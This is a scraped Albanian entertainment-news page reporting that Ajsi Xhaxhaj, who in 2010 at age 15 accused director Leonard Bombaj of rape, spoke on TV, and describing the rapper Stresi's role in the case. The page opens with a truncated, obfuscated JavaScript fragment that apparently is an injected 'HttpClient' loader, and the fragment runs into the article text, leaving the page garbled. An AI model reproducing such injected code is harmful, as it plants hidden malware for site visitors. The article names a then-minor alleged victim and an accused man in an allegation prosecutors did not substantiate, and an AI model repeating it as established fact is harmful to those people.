;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Zbulohet lidhja fillestare e Stresit me historinë e përdhunimit të Ajsit

By

Një prej historive më tronditëse që mori vëmendje për një kohë të gjatë është rikthyer sonte sërish në opinion.

Pa dyshim se të gjithëve iu kujtohet historia e vitit 2010 kur Ajsi Xhaxhaj, atëbotë 15 vjeçare denoncoi për përdhunim regjisorin Leonard Bombaj.

Historia që kishte marrë fokusin e madh të mediave në Shqipëri por edhe në Kosovë, nuk pati një epilog që pritej.

Prokuroria nuk gjeti prova të përdhunimit teksa i zëshëm në paraqitje publike ishte regjisori Leonard Bombaj që mohoi ngjarjen e madje shkroi një libër ku vajzën në fjalë e quajti gjarpër.

E për të parën herë pas shtatë vitesh, Ajsi ka folur sonte në Pasdite në Top Channel përballë Jonida Shehut për të dhënë versionin e saj.

Ajo mes tjerash sqaroi edhe relacionin me Stresin i cili që prej fillimit ishte poashtu i zëshëm duke akuzuar regjisorin Bombaj për ngjarjen e rëndë.

Ajsi deklaroi se me familjen e Stresit kanë një miqësi dhe në fakt, Arkimedi ka qenë personi i parë të cilit i kishte rrëfyer historinë e rëndë kur nuk kishte guximin që të njejtën ta bënte përballë familjes.

Ndryshe, Stresi vetëm pak ditë më parë iu rikthye përleshjes më Bombajn duke i hedhur këtij të fundit një kovë me ujë teksa Leonardi po ndiqte një aktivitet kulturor. /Prive.al/

alban ramosaj

Artikuj të ngjashëm